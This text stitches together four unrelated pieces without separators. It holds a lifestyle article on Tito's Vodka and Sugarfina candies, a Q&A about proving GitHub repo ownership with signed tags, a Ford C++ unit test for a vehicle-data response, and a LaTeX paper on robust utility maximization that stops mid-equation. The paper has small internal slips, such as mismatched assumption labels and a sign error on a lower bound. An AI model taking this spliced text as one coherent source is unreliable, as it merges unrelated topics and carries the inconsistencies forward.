Tito’s Vodka Partners with Candy Company for Boozy New Treats Any time there is a chance to combine two of our favorite activities — drinking and eating, of course — we will jump at it. Whether it’s pounding brewskis and eating hot dogs at a football game, working our way through a Napa Valley Cabernet Sauvignon and California cuisine pairing, or drinking whiskey and eating wings, the ability to put the two necessities together is great. Now, we have a new way to do that, which anyone with a sweet tooth is really going to enjoy. Tito’s Vodka has partnered with the luxury candy boutique Sugarfina to create a new set of vodka-infused candies. The collection will feature two new sweets inspired by the Moscow Mule and by (just about) everyone’s love of chocolate. The first new candy, American Mule bears, are non-alcoholic gummy bears imbued with Tito’s and a splash of ginger beer. The taste calls to mind one of the drinks that Tito’s is perhaps most known for. If you’re looking for actual booze in your candy, though, you’re going to want to try the Tiro’s Vodka Cordials. Made of rich dark chocolate, each cordial has a sip of Tito’s contained inside. Both sets comes in a signature Sugarfina cube and retail for $8.50. If you decide you need all of these in your life, there is the “Vodka Is Always a Good Idea Candy Bento Box,” which will contain both flavors. The collection comes in a custom box and is accompanied by a mini hand-crafted copper mule mug. The Candy Bento Box retails for $28. Previously, Sugarfina has worked with Casamigos Tequila to put out margarita-flavored and Paloma-flavored candies. For those that want the boozy flavor but maybe not the alcohol in their candy, they’ve also got a line that includes bourbon gummies and more. Check out more about Tito’s vodka, then head on over to the Sugarfina website and get yourself some sweets. The Manual is simple — we show men how to live a life that is more engaged. As our name implies, we offer a suite of expert guides on a wide range of topics, including fashion, food, drink, travel, and grooming. We don’t boss you around; we’re simply here to bring authenticity and understanding to all that enriches our lives as men on a daily basis.
Q: How to prove the ownership of a public git/github repo? How can i clearly prove to others persons (for example very picky employers) that i'm the creator of a public github repo (beside avatar pictures etc.) ? Does git has something like a key file that's proves the authencity of a repo or is there a best practice for doing so ? Note: If you think that this question might not fit to StackOverflow, please comment with an alternative and I will move this question instantly. A: You could add a signed tag to the repository. This is a gpg signature, so it can be cryptographically verified. I wrote about how to go about it here
/* * Copyright (c) 2019, Ford Motor Company * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * Redistributions of source code must retain the above copyright notice, this * list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following * disclaimer in the documentation and/or other materials provided with the * distribution. * * Neither the name of the Ford Motor Company nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. */ #include "gtest/gtest.h" #include "application_manager/commands/commands_test.h" #include "vehicle_info_plugin/commands/vi_commands_test.h" #include "mobile/get_vehicle_data_response.h" #include "smart_objects/smart_object.h" namespace test { namespace components { namespace commands_test { namespace mobile_commands_test { namespace get_vehicle_data_response { namespace am = ::application_manager; using am::commands::MessageSharedPtr; using vehicle_info_plugin::commands::GetVehicleDataResponse; typedef std::shared_ptr<GetVehicleDataResponse> GetVehicleDataResponsePtr; class GetVehicleDataResponseTest : public VICommandsTest<CommandsTestMocks::kIsNice> {}; TEST_F(GetVehicleDataResponseTest, GetVehicleDataResponse_SUCCESS) { MessageSharedPtr message(CreateMessage(smart_objects::SmartType_Map)); GetVehicleDataResponsePtr command( CreateCommandVI<GetVehicleDataResponse>(message)); EXPECT_CALL(mock_rpc_service_, SendMessageToMobile(message, _)); command->Run(); } } // namespace get_vehicle_data_response } // namespace mobile_commands_test } // namespace commands_test } // namespace components } // namespace test
--- abstract: ': We study a robust utility maximization in the dominated case and with non-entropic penalty term. We consider two types of Penalties. The first one is the f-divergence penalty studied in the general framework of a continuous filtration. The second called consistent time penalty studied in the context of a Brownian filtration. We prove in the two cases that there is a unique optimal probability measure solution of the robust problem which is equivalent to the historical probability. In the case of consistent time penalty, we characterize the dynamic value process of our stochastic control problem as the unique solution of a quadratic backward stochastic differential equation.' address: - | University of Tunis El Manar\ Laboratoire de Modélisation Mathématique et Numérique\ dans les Sciences de l’Ingénieur, ENIT\ - | Université du Maine\ Institut du Risque et de l’Assurance\ Laboratoire Manceau de Mathématiques\ - | University of Tunis El Manar\ Laboratoire de Modélisation Mathématique et Numérique\ dans les Sciences de l’Ingénieur, ENIT\ author: - - - title: Robust utility maximization problem with a general penalty term --- [**Key words :**]{} Utility Maximization, Backward Stochastic Differential Equations, model uncertainty, Robust control. [**MSC Classification (2000) :**]{} 92E20, 60J60, 35B50. Introduction ============ In the literature connected with the utility maximization problem, the optimality criterion is based on a classical expected utility functional of von Neumann-Morgenstern form, which requires the choice of a single probabilistic model $P$. In reality, the choice of $P$ is subject to model uncertainty. Schmeidler [@Schmei89] and Gilboa and Schmeidler [@GS89] proposed the use of robust utility functionals of the form $$X\mapsto \inf\limits_{Q\in \Qc}E_Q[U(X)]$$ where $\Qc$ is a set of prior probability measures. Later, Maccheroni, Marinacci and Rustichini [@Mac06] suggested modelingl investor preferences by robust utility functionals of the form $$\label{macrobustness} X\mapsto \inf\limits_{Q\in \Qc}E_Q[U(X)+\gamma(Q)].$$ The most popular choice for the penalty function is the entropic penalty function $\gamma(Q) = \beta H(Q|P)$ for a constant $\beta > 0$ and a reference probability measure $P$; see, e.g., Hansen and Sargent [@HS01]. A general class of the penalty function $\gamma$ was developed by Schied using duality methods. In this article, we are interested in a control problem of type (\[macrobustness\]) with the general penalty term by using stochastic control approach as in Bordigoni, Matoussi and Schweizer [@BMS05]. Specifically we are trying to solve the following problem $$\inf\limits_{Q\in\Qc}E_Q [\Uc_{0,T}+ \beta \Rc_{0,T}(Q)]$$ where $$\Uc^{\delta}_{t,T}:=\alpha \dint_t^TS_s^\delta U_sds+\bar{\alpha}S_T^\delta \bar{U}_T$$ with $\alpha,\bar{\alpha}$ are two positive parameters, $ \beta \in(0,+\infty)$, $(U_t)_{0\leq t \leq T}$ a progressively measurable process, $\bar{U}_T$ a random variable $\Fc_T$-measurable and $S^\delta$ is the discounting process defined by: $S_t^\delta := \exp(-\dint_0^t\delta_sds);0\leq t \leq T$ where $(\delta_t)_{0\leq t \leq T}$ is a progressively measurable process. $\Rc_{t,T}(Q)$ denotes a penalty term which is written as a sum of a penalty rate and a final penalty.\ Note that the cost functional: $$c(w,Q):=\Uc_{0,T}^\delta+\beta \Rc_{0,T}^\delta(Q)$$ consists of two terms. The first is a $Q$-expected discounted utility with discount rate $\delta$, utility rate $U_s$ at time $s$ and terminal utility $\bar{U}_T$ at time $T$. Usually, $U_s$ comes from consumption and $U'_T$ is related to the terminal wealth. The second term, which depends only on $Q$, is a penalty term which can be interpreted as being a kind of “distance” between $Q$ and the historical probability $P$. In the presence of uncertainty or model ambiguity, sometimes also called the Knight uncertainty, the economic agent does not know the probability law governing the markets. The economic agent has a certain conjecture about the position of the true probability distribution $Q$,but not with total confidence. So he regards it as being more plausible than other probabilities. This plausibility can be measured using $\Rc_{0,T}(Q)$. The agent penalizes each sight probabilistic possible $Q$ in terms of penalty $\Rc_{0,T}(Q)$ and adopts an approach of the worst case by evaluating the profit of a given financial position. The role of proportionality parameter $\beta$ is to measure the degree of confidence of the decision maker in the reference probability $P$, or, in other words, the concern for the model erroneous specification. The higher value of $\beta$ corresponds to more confidence.\ In this paper we studied two classes of penalties. The first class is the $f$-divergence penalty introduced by Cizar [@Ciz] given in our framework by: $$\label{f-divergence} \Rc_{t,T}^\delta(Q):=\dint_t^T\delta_s\frac{S_s^\delta}{S_t^\delta} \frac{Z_t^Q}{Z_s^Q}f(\frac{Z_s^Q}{Z_t^Q})ds+\frac{S_T^\delta}{S_t^\delta} \frac{Z_t^Q}{Z_T^Q}f(\frac{Z_T^Q}{Z_t^Q}); \forall 0\leq t \leq T.$$ where $f$ is a convex function. In this case, set $\mathcal{Q}$ consists of all models $Q$ absolutely continuous with respect to $P$ whose density process (with respect to $P$) $Z^Q$ satisfies: $\E_P[\displaystyle{f(Z^Q_T)}]<+\infty.$\ The second class called consistent time penalty studied in the context of a Brownian filtration generated by a Brownian motion $(W_t)_{0\leq t \leq T}.$ $$\label{consistent}\Rc_{t,T}^\delta(Q):=\dint_t^T\delta_s\frac{S_s^\delta}{S_t^\delta} (\int_t^s h(\eta_u)du)ds+\frac{S_T^\delta}{S_t^\delta}\int_t^T h(\eta_u)du ; \forall 0\leq t \leq T$$ where $h$ is a convex function and the density process of $Q^\eta$ with respect to $P$ can be written: $$\frac{dQ^\eta}{dP}=\Ec(\int_0^.\eta_u dW_u).$$ In this case, set $\mathcal{Q}$ is formed by all models $Q^\eta $ absolutely continuous with respect to $P$ such that $\E_{Q^\eta}[\dint_0^Th(\eta_s)ds]<+\infty.$ Using HJB equation technics, Schied [@SC08] studied the same problem when $\delta$ is constant and the process $\eta$ takes values in a compact convex set in $\mathbb{R}^2$. Finally, more recently Laeven and Stadje [@LS12] have studied the case of consistent time penalty by using another proof of the existence result and by assuming a bounded final condition.\ The paper is organized as follows. In the second section we study the robust utility problem where the penalty is modeled by the $f$-divergence and we prove the existence of a unique optimal probability measure $Q^*$ equivalent to $P$ for our optimization problem. The third section is devoted to the class of consistent time penalty. In particular, we characterize in this case the value process for our control problem as the unique solution of a generalized class of quadratic BSDEs. Finally, we give some technical results in the Appendix. Class of f-divergence penalty ============================= The setting ----------- This section gives a precise formulation of our optimization problem and introduces a number of notations for later use. We start with a filtered probability space $(\Omega,\Fc, \F,P)$ over a finite time horizon $T\in (0,+\infty).$\ Filtration $\F = (\Fc_t)_{0\leq t \leq T}$ satisfies the usual conditions of right-continuity and $P$-completeness.\ For any probability measure $Q\ll P$ on $\Fc_T$, the density process of $Q$ with respect to $P$ is the RCLL $P$-martingale $Z^Q = (Z^Q_t )_{0\leq t \leq T}$ with $$Z^Q_t = \frac{dQ}{dP}\mid_{\Fc_t}= \E_P[\frac{dQ}{dP}\mid{\Fc_t}];\forall 0\leq t \leq T$$ Since $Z^Q$ is closed on the right by $Z^Q_t = \frac{dQ}{dP}\mid_{\Fc_t}$, $Z^Q$ can be identified with $Q$.\ For all $Q\ll P$ on $\Fc_T$, we define the penalty term by $$\Rc_{0,T}^\delta:=\dint_0^T\delta_sS_s^\delta \frac{f(Z_s^Q)}{Z_s^Q}ds+S_T^\delta \frac{f(Z_T^Q)}{Z_T^Q};\;\; \textrm{for all} \;\; 0\leq t \leq T$$ where $f : [0,+\infty) \mapsto \R$ is continuous, strictly convex and satisfies the following assumptions: 1. $f(1)=0.$ 2. There is a constant $\kappa \in \R_+$ such that $f(x)\geq -\kappa, \;\;\textrm{for all}\;\; x\in (0,+\infty).$ 3. $\lim\limits_{x \mapsto +\infty}\dfrac{f(x)}{x}=+\infty.$ The basic goal is to $$\label{min1} \textrm{minimize the functional}\; Q \mapsto \Gamma(Q) := \E_Q[c(.,Q)]$$ over a suitable class of probability measures $Q \ll P$ on $\Fc_T$ . For a convex function $\varphi$ we define the following functional spaces:\ $L^{\varphi} $ is the space of all ${\cal{ F}}_T $ measurable random variables $X $ with $$E_P\left[\varphi\left(\gamma \vert X \vert\right)\right]<\infty \qquad \hbox{ for all } \gamma>0,$$ $D^{\varphi}_0$ is the space of all progressively measurable processes $X={(X_t)}_{0\le t\le T}$ with $$E_P\left[\varphi\left(\gamma {~ \rm{ess}\sup}_{0\le t\le T}|X_t|\right)\right]<\infty \qquad \hbox{ for all } \gamma>0,$$ $D^{\varphi}_1$ is the space of all progressively measurable processes $X={(X_t)}_{0\le t\le T}$ such that $$E_P\left[\varphi\left(\gamma\int_0^T |X_s|ds\right)\right]<\infty \qquad \hbox{ for all } \gamma >0.$$ For any probability measures $Q$ on $(\Omega,\Fc)$, we define the f-divergence of $Q$ with respect to $P$ by: $$d(Q|P):=\left\{\begin{array}{cc} \E_P[f(\frac{dQ}{dP}|_{\Fc_T})] & \textrm{if} \; Q \ll P \;\textrm{on}\; \Fc_T \\ +\infty & \textrm{otherwise} \end{array}\right..$$ If $f(x)=x\ln x,$ then $d(Q|P)$ is called relative entropy and is denoted by $H(Q|P).$\ We denote by $\Qc_f$ the space of all probability measures $Q$ on $(\Omega,\Fc)$ with $Q \ll P$ on $\Fc_T,$ $Q = P$ on $\Fc_0$ and $d(Q|P) < +\infty.$ Set $\Qc_f^e$ is defined as follows $$\Qc_f^e:=\{Q \in \Qc_f | Q\approx P \; \textrm{on} \; \Fc_T \}.$$ The conjugate function of $f$ on $\R_+$ is defined by: $$\label{conjugate function} f^{\ast }(x)=\sup\limits_{y>0}{(xy-f(y))}.$$ $f^{\ast }$ is a convex function, non decreasing, non negative and satisfies: $$\label{convex inequality1} xy\leq f^{\ast }(x)+f(y) ,\;\;\textrm{for all} \;\; x\in \R_+ \;\; \mbox{and}\;\; y>0$$ and also $$\label{convex inequality2} xy\leq\frac{1}{\gamma} [f^{\ast }(\gamma x)+f(y)] ,\;\;\textrm{for all}\;\; x\in \R_+, \;\; \gamma>0\;\; \mbox{and} \;\; y>0.$$ For a precise formulation of (\[min1\]), we now assume: 1. $\delta $ is positive and bounded by $\left\Vert \delta \right\Vert _{\infty }.$ 2. Process $U$ belongs to $D_1 ^{f^*}$ and the random variable $\bar{U}_T$ is in $L^{f^*}$ \[boundness of fdiv\] 1. Assumption $f(x)\geq -\kappa$ implies that : $$\label{absolute} \mid f(x)\mid \leq f(x)+2\kappa, \quad \forall x \geq 0.$$ 2. In the case of entropic penalty, we have $f(x)=x\ln(x)$ and then $f^{\ast }(x)=\exp({x-1}). $ As in Bordigoni, Matoussi and Schweizer [@BMS05], the integrability conditions are formulated as $$\mathbb{E}_P\left[\displaystyle \exp({\lambda \int_{0}^{T}|U(s)|ds})\right] <+\infty \;\; \textrm{and} \;\; \mathbb{E}_P\left[ \displaystyle \exp({\lambda |\bar{U}_T|})\right] <+\infty\;\;\textrm{for all} \;\; \lambda>0.$$ Existence of optimal probability measure ---------------------------------------- The main result of this section is to prove that the problem (\[min1\]) has a unique solution $Q^*\in \Qc_f.$ Under some additional assumptions, we prove that $Q^*$ is equivalent to $P$. This is proved for a general filtration $\F$. This section begins by establishing some estimates for later use. \[prop1\] Under **(A1)-(A2)**, we have: 1. $c(.,Q) \in L^1(Q)$, 2. $\Gamma (Q)\leq C(1+d(Q|P))$, where $C$ is a positive constant depending only on $\alpha ,\bar{\alpha} ,\beta ,\delta ,T,U$ and $\bar{U}.$ In particular $\Gamma(Q)$ is well-defined and finite for every $Q\in \Qc_f$ 1. We first prove that that for all $ Q \in Q_f$, $c(.,Q)$ belongs to $ L^1(Q)$. Set $R:=\alpha \int_{0}^{T}|U(s)|ds+\bar{\alpha}|\bar{U}|$, we get $$|Z_T^Qc(.,Q)| \leq Z_T^Q R +\left \Vert \delta \right\Vert _{\infty } Z_T^Q \int_{0}^{T}\left\vert \frac{f(Z_{s}^{Q})}{Z_s^Q}\right\vert ds+\left\vert f(Z_{T}^{Q})\right\vert.$$ By the estimate (\[convex inequality1\]), we have $Z_{T}^{Q}R \leq f(Z_{T}^{Q})+f^{\ast }(R).$ From assumption **(A2)**, the variable random $f^{\ast }(R)$ is in $L^1(P)$ and from Remark \[boundness of fdiv\], we get that for all $ Q \in Q_f$, $ f(Z_T^Q)$ belongs to $ L^1(P).$ It remains to show that $Z_T^Q \displaystyle\int_{0}^{T}\left\vert \frac{f(Z_{s}^{Q})}{Z_s^Q}\right\vert ds $ belongs to $ L^1(P).$ By Tonelli-Fubini’s Theorem, we have $$\begin{split} \E_P\big[Z_T^Q \displaystyle\int_{0}^{T}\left\vert \frac{f(Z_{s}^{Q})}{Z_s^Q}\right\vert ds \big]&=\displaystyle\int_{0}^{T}\E_P\big[Z_T^Q \left\vert \frac{f(Z_{s}^{Q})}{Z_s^Q}\right\vert\big] ds\\&=\displaystyle\int_{0}^{T}\E_P\big[Z_s^Q \left\vert \frac{f(Z_{s}^{Q})}{Z_s^Q}\right\vert\big] ds=\displaystyle\int_{0}^{T}\E_P\big[\left\vert f(Z_{s}^{Q})\right\vert\big]ds. \end{split}$$ Jensen’s inequality allows $$f(Z_{s}^{Q})=f\left( \E_{P}\left[ Z_{T}^{Q}|\mathcal{F}_{s}\right] \right) \leq \E_{P}\left[ f\left( Z_{T}^{Q}\right) |\mathcal{F}_{s}\right].$$ By taking the expectation under $P,$ we obtain $$\label{c1}\E_{P}\left( f(Z_{s}^{Q})\right) \leq \E_{P}\left[ f\left( Z_{T}^{Q}\right) \right].$$ Consequently, $$\label{c1'} \E_P\big[\vert f(Z_{s}^{Q})\vert\big]\leq \E_{P}\left[ f\left( Z_{T}^{Q}\right) \right]+2\kappa,$$ and so, $s\mapsto\E_P\big[\vert f(Z_{s}^{Q})\vert\big]$ is in $L^1([0,T]).$ Whence, $Z_T^Q \displaystyle\int_{0}^{T}\left\vert \frac{f(Z_{s}^{Q})}{Z_s^Q}\right\vert ds $ belongs to $ L^1(P).$ 2. From the definition of $\Gamma$, we have $$\Gamma (Q) \leq \E_{P}\left[ Z_{T}^{Q}R\right] +\beta \E_{P}\left[\left\Vert \delta \right\Vert _{\infty }\int_{0}^{T}\left\vert f(Z_{s}^{Q})\right\vert ds+\left\vert f(Z_{T}^{Q})\right\vert \right].$$ By the inequality (\[c1’\]), we have $$\begin{split} \E_{P}\left[\left\Vert \delta \right\Vert _{\infty}\int_{0}^{T}\vert f(Z_{s}^{Q})\vert ds+\vert f(Z_{T}^{Q})\vert \right]&=\left\Vert \delta \right\Vert _{\infty}\int_{0}^{T}\E_{P}\left[\vert f(Z_{s}^{Q})\vert\right] ds+\E_{P}\left[\vert f(Z_{T}^{Q})\vert \right]\\&\leq \left\Vert \delta \right\Vert _{\infty}T\Big(\E_{P}\left[ f\left( Z_{T}^{Q}\right) \right]+2\kappa\Big)+\E_{P}\left[ f\left( Z_{T}^{Q}\right) \right]+2\kappa, \end{split}$$ and consequently, $$\Gamma (Q)\leq \E_{P}\left[ f^{\ast }(R)\right] +2 \kappa \beta (\left\Vert \delta \right\Vert _{\infty }T+1)+(1+\beta \left\Vert \delta \right\Vert _{\infty }T+\beta )d(Q|P).$$ Constant $C$ is defined by: $$C:=\max \left( E_{P}\left[ f^{\ast }(R)\right]+2\kappa\beta (\left\Vert \delta \right\Vert _{\infty }T+1),(1+\beta \left\Vert \delta \right\Vert _{\infty }T+\beta )\right) .$$ From assumptions (**A1**)-(**A2**), $C$ is finite, positive and answers the question. A more precise estimation of $\Gamma ( Q)$ will be needed: \[cont1\] There is a positive constant $K$ which depends only on $\alpha ,\bar{\alpha} ,\beta ,\delta ,T,U,\bar{U}$ such that $$d(Q|P)\leq K( 1+\Gamma ( Q)).$$ In particular $\inf\limits_{Q\in Q_{f}}$ $\Gamma (Q) >-\infty. $ From Bayes’ formula, we have: $$\begin{split} \E_Q [ \dint_{0}^{T}\delta _sS_s^\delta\frac{f( Z_s^Q)}{Z_s^Q} ds|\Fc_\tau] &= \frac{1}{Z_\tau^Q}\E_{P}[\dint_0^T\delta _sS_s^\delta f( Z_s^Q)ds|\Fc_\tau] \geq -\frac{1}{Z_\tau^Q}T \kappa \parallel \delta \parallel_\infty. \end{split}$$ In the same way, by using $\exp(-T\parallel\delta\parallel _{\infty})\leq S_{T}^{\delta }\leq 1$, we get: $$\begin{split} \E_{Q}[S_T^\delta \dfrac{f(Z_T^Q)}{Z_T^Q}|\Fc_\tau]& =\frac{1}{Z_\tau^Q}\E_P[ S_T^\delta f( Z_{T}^{Q})|\mathcal{F}_{\tau}] \\& = \frac{1}{Z_\tau^Q} \E_P\big[ S_T^\delta [f( Z_{T}^{Q})-\kappa+\kappa]|\mathcal{F}_{\tau}\big] \\& \geq \frac{1}{Z_\tau^Q}(-\kappa + e^{-T \parallel\delta \parallel _{\infty }}(\kappa +\E_P[ f( Z_{T}^{Q})|\mathcal{F}_{\tau}]) \\& \geq \frac{1}{Z_\tau^Q}(-\kappa + e^{-T \parallel\delta \parallel _{\infty }}\E_P[ f( Z_{T}^{Q})|\mathcal{F}_{\tau}]). \end{split}$$ We set $R_\tau:= \alpha \int_{\tau}^{T}|U_s|ds+\bar{\alpha}|\bar{U}_T|$ and $R=R_0.$ By using $0 \leq S^\delta \leq 1,$ and Bayes’ formula, we have $$\begin{split} \E_Q[\Uc^\delta_{0,T}|\Fc_\tau]&\geq -\E_Q[R|\Fc_\tau]\\&=-\frac{1}{Z_\tau^Q}\E_P[Z_T^Q R|\Fc_\tau]. \end{split}$$ By using (\[convex inequality2\]) and since $f^*$ is non decreasing, we obtain: $$\begin{split} \E_P[Z_T^QR|\Fc_\tau]&\leq \frac{1}{\gamma}\E_P[f(Z_T^Q)+f^*(\gamma R)|\Fc_\tau] \\&\leq\frac{1}{\gamma}\E_P[f(Z_T^Q)|\Fc_\tau]+\frac{1}{\gamma}\E_P[f^*(\gamma R)|\Fc_\tau]. \end{split}$$ Thus, we have: $$\label{ineq7} \begin{split} \E_Q[c(.,Q)|\Fc_\tau]&\geq -\beta \frac{1}{Z_\tau^Q}T \kappa \Vert \delta \Vert_\infty +\beta \frac{1}{Z_\tau^Q}(-\kappa + e^{-T \Vert\delta \Vert _{\infty}}\E_P[ f( Z_{T}^{Q})|\mathcal{F}_{\tau}])\\& -\frac{1}{Z_\tau^Q}\Big[\frac{1}{\gamma}\E_P[f(Z_T^Q)|\mathcal{F}_{\tau}]+\frac{1}{\gamma}\E_P[f^*(\gamma \alpha \int_{0}^{T}|U_s|ds+\gamma \bar{\alpha}|\bar{U}_T| )|\Fc_\tau]\Big]. \end{split}$$ By choosing $ \tau=0$ and taking the expectation under $Q$, we obtain: $$\begin{split}\Gamma(Q)\geq &-\beta T \kappa \Vert \delta \Vert_\infty +\beta [-\kappa + e^{-T \Vert\delta \Vert _{\infty}}\E_P[f(Z_{T}^{Q})]]-\\& (\frac{1}{\gamma}\E_P[f(Z_T^Q)]+\frac{1}{\gamma}\E_P[f^*(\gamma \alpha \int_{0}^{T}|U_s|ds+\gamma \bar{\alpha}|\bar{U}_T| )]) \\&=-\beta \kappa (T \Vert \delta \Vert_\infty+1)+d(Q|P)[\beta e^{-T \Vert\delta \Vert _{\infty}}-\frac{1}{\gamma}] \\&-\frac{1}{\gamma}\E_P[f^*(\gamma \alpha \int_{0}^{T}|U_s|ds+\gamma \bar{\alpha}|\bar{U}_T|)]). \end{split}$$ By choosing $\gamma $ large enough, there exists $\eta>0$ such that $ \beta e^{-T \Vert\delta \Vert _{\infty}}-\frac{1}{\gamma} \geq \eta.$ We set $$K:= \frac{1}{\eta} \max (1,\beta \kappa (T \Vert \delta \Vert_\infty+1)+\frac{1}{\gamma}\E_P[f^*(\gamma \alpha \int_{0}^{T}|U_s|ds+\gamma \bar{\alpha}|\bar{U}_T|)]).$$\ Under the assumptions **(A1)-(A2)**, $K$ is finite and so the proof of the proposition is achieved. The following lemma is useful to show the existence of $Q^*$ which realizes the infimum of $Q\mapsto\Gamma(Q)$ \[lemma2\] For all $ \gamma >0$ and all $A \in \Fc_T$ we have : $$\E_Q[|\Uc^\delta_{0,T}|\textbf{1}_A] \leq \frac{1}{\gamma}(d(Q|P)+\kappa)+\frac{1}{\gamma}\E_P[f^*(\gamma \alpha \int_{0}^{T}|U_s|ds+\gamma \bar{\alpha}|\bar{U}_T|)\textbf{1}_A].$$ From the definition of $\Uc^\delta_{0,T}$ and using inequality (\[convex inequality1\]), we have $$\begin{split} Z_T^Q|\Uc^\delta_{0,T}|\textbf{1}_A &\leq Z_T^Q (\alpha \int_{0}^{T}|U_s|ds+\gamma \bar{\alpha}|\bar{U}|)\textbf{1}_A \\& \leq \frac{1}{\gamma}[f(Z_T^Q)+f^*(\gamma \alpha \int_{0}^{T}|U_s|ds+\gamma \bar{\alpha}|\bar{U}|)]\textbf{1}_A. \end{split}$$ Using Assumption **(H2)**, we obtain $$\begin{split} Z_T^Q|\Uc^\delta_{0,T}|\textbf{1}_A & \leq \frac{1}{\gamma}[f(Z_T^Q)+\kappa+f^*(\gamma \alpha \int_{0}^{T}|U_s|ds+\gamma \bar{\alpha}|\bar{U}|)]\textbf{1}_A \\& \leq \frac{1}{\gamma}[f(Z_T^Q)+\kappa]+\frac{1}{\gamma}[f^*(\gamma \alpha \int_{0}^{T}|U_s|ds+\gamma \bar{\alpha}|\bar{U}|)]\textbf{1}_A. \end{split}$$ The result follows by taking the expectation under $P$.\ The following theorem shows the existence of unique probability measure solution of optimization problem (\[min1\]) \[exisun\] Under **(A1)-(A2)**, there is a unique $Q^*\in \Qc_f$ which minimizes $Q \mapsto \Gamma(Q)$ over all $Q \in \Qc_f$ . 1. $Q \mapsto \Gamma(Q)$ is strictly convex; hence $Q^*$ must be unique if it exists. 2. Let $(Q^n)_{n\in \N}$ be a minimizing sequence in $\Qc_f$ i.e. $$\searrow \lim\limits_{n \rightarrow +\infty}\Gamma(Q^n)=\inf\limits_{Q\in\Qc_f}\Gamma(Q)>-\infty,$$ and we denote by $Z^n = Z^{Q^n}$ the corresponding density processes.\ Since each $Z_T^n\geq 0$, it follows from Koml$\acute{o}$s’ theorem that there exists a sequence $(\bar{Z}_T^n )_{n\in \N}$ with $\bar{Z}_T^n \in conv(Z^n_T ,Z^{n+1}_T , ...)$ for each $n\in\N$ and such that $(\bar{Z}^n_T )$ converges $P$-a.s. to some random variable $\bar{Z}^{\infty}_T$ which is nonnegative but may take the value $+\infty.$ Because $\Qc_f$ is convex, each $\bar{Z}_T^n$ is again associated with some $\bar{Q}^n \in \Qc_f.$ We claim that this also holds for $\bar{Z}^{\infty}_T$ , i.e., that $d\bar{Q}^{\infty} :=\bar{Z}^{\infty}_TdP$ defines a probability measure $\bar{Q}^{\infty}\in \Qc_f.$ To see this, note first that we have $$\label{ineq1} \Gamma(\bar{Q}^n) \leq \sup\limits_{m\geq n}\Gamma(Q^m)= \Gamma(Q^n)\leq \Gamma(Q^1),$$ because $Q \mapsto \Gamma(Q)$ is convex and $n \mapsto \Gamma(Q^n)$ is decreasing. Hence Proposition $\ref{cont1}$ yields $$\label{ineq2} \begin{split} \sup\limits_{n\in \N}\E_P [f (\bar{Z}^n) ] &= \sup\limits_{n\in \N}d(\bar{Q}^n|P) \leq K(1 + \sup\limits_{n\in \N}\Gamma(\bar{Q}^n))\\& \leq K(1 + \sup\limits_{n\in \N}\Gamma({Q}^n))\leq K(1 +\Gamma({Q}^1))<+\infty. \end{split}$$ From Assumption **(H3)** and using de la Vallée-Poussin’s criterion, we obtain the $P$-uniformly integrability of $(\bar{Z}^n_T )_{n\in\N}$ and therefore $(\bar{Z}^n_T )_{n\in\N}$ converges in $L^1(P).$ This implies that $\E_P[\bar{Z}^{\infty}_T ]=\lim\limits_{n\rightarrow +\infty}E_P[\bar{Z}^n_T]=1$ and so $\bar{Q}^{\infty}$ is a probability measure and $\bar{Q}^{\infty}\ll P$ on $\Fc_T$ . Because $f$ is bounded from below by $\kappa$, Fatou’s lemma and inequality(\[ineq2\]) yield $$\label{c3} d(\bar{Q}^\infty|P) = \E_P[f(\bar{Z}^\infty_T)] \leq \liminf\limits_{n\rightarrow +\infty} \E_P[f(\bar{Z}^n_T)] < +\infty.$$ Finally, we also have $\bar{Q}^\infty = P $ on $\Fc_0.$ In fact, $(\bar{Z}^n_T)$ converges to $\bar{Z}^\infty_T$ strongly in $L^1(P)$, hence also weakly in $L^1(P)$ and so we have for every $A \in \Fc_0:$ $$\bar{Q}^\infty[A] = \E_P[\bar{Z}^\infty_T \textbf{1}_A] =\lim\limits_{n \rightarrow +\infty} \E_P [Z^n_T \textbf{1}_A] =\lim\limits_{n\rightarrow +\infty}\bar{Q}^n[A]=P[A].$$ The last equality holds since $\bar{Q}^n(A)=P(A)$ for all $n\in \mathbb{N}$ and $A \in \Fc_0$. This shows that $\bar{Q}^{\infty}\in\Qc_f $. 3. We now want to show that $Q^* := \bar{Q}^\infty$ attains the infimum of $Q \mapsto\Gamma(Q)$ on $\Qc_f.$\ Let $\bar{Z}^\infty$ be the density process of $\bar{Q}^\infty$ with respect to $P.$ Because we know that $(\bar{Z}^n_T)$ converges to $\bar{Z}^\infty$ in $L^1(P)$, Doob’s maximal inequality $$P[\sup\limits_{0\leq t \leq T} \mid \bar{Z}^\infty_t-\bar{Z}^n_t \mid\geq \epsilon]\leq \frac{1}{\epsilon} \E_P[\mid \bar{Z}^\infty_T-\bar{Z}^n_T \mid]$$ implies that $(\sup\limits_{0\leq t \leq T} \mid \bar{Z}^\infty_t-\bar{Z}^n_t \mid)_{n\in\N}$ converges to $0$ in $P$-probability.\ By passing to a subsequence that we still denote by $(\bar {Z}^n)_{n\in\N}$, we may thus assume that the sequence $(\bar {Z}^n)$ converges to $\bar{Z}^\infty$ uniformly in $t$ with $P$-probability 1. This implies that the sequence $ (Z^n_T c( .,\bar{Q}^n) )$ converges to $ \bar{Z}_T^\infty c(.,\bar{Q}^\infty) P$-a.s. and in more detail with $$\bar{Y}_1^n:=\bar {Z}^n_T \Uc_{0,T}^\delta , 